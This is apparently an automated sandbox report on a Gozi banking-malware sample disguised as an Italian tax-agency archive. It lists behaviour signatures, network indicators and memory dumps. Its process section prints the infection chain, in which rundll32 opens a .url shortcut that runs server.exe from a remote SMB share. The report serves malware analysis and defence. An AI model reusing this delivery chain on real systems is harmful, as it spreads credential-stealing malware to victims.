Analysis Overview
SHA256
0284ebc8b81dd2894fbdb7ca298d1c2c85c41630b9b9ab99aed51aec86073aae
Threat Level: Known bad
The file AgenziaEntrate.zip was found to be: Known bad.
Malicious Activity Summary
Gozi
Checks computer location settings
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-08 09:08
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-08 09:08
Reported
2023-03-08 09:10
Platform
win10v2004-20230220-en
Max time kernel
142s
Max time network
141s
Command Line
Signatures
Gozi
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\rundll32.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3264 wrote to memory of 3472 | N/A | C:\Windows\System32\rundll32.exe | \??\UNC\46.8.210.31\Agenzia\server.exe |
| PID 3264 wrote to memory of 3472 | N/A | C:\Windows\System32\rundll32.exe | \??\UNC\46.8.210.31\Agenzia\server.exe |
| PID 3264 wrote to memory of 3472 | N/A | C:\Windows\System32\rundll32.exe | \??\UNC\46.8.210.31\Agenzia\server.exe |
Processes
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\AgenziaEntrate\AgenziaEntrate.url
\??\UNC\46.8.210.31\Agenzia\server.exe
"\\46.8.210.31\Agenzia\server.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 46.8.210.31:445 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.210.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.238.32.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checklist.skype.com | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 20.189.173.12:443 | tcp | |
| NL | 8.238.20.126:80 | tcp | |
| NL | 173.223.113.164:443 | tcp | |
| NL | 173.223.113.131:80 | tcp | |
| US | 131.253.33.203:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| RU | 62.173.138.6:80 | tcp |
Files
memory/3472-137-0x00000000004D0000-0x00000000004DB000-memory.dmp
memory/3472-138-0x00000000020A0000-0x00000000020AD000-memory.dmp
memory/3472-141-0x0000000000400000-0x000000000044C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-08 09:08
Reported
2023-03-08 09:10
Platform
win7-20230220-en
Max time kernel
129s
Max time network
33s
Command Line
Signatures
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\AgenziaEntrate\AgenziaEntrate.url
Network
Files
memory/916-54-0x0000000002140000-0x0000000002141000-memory.dmp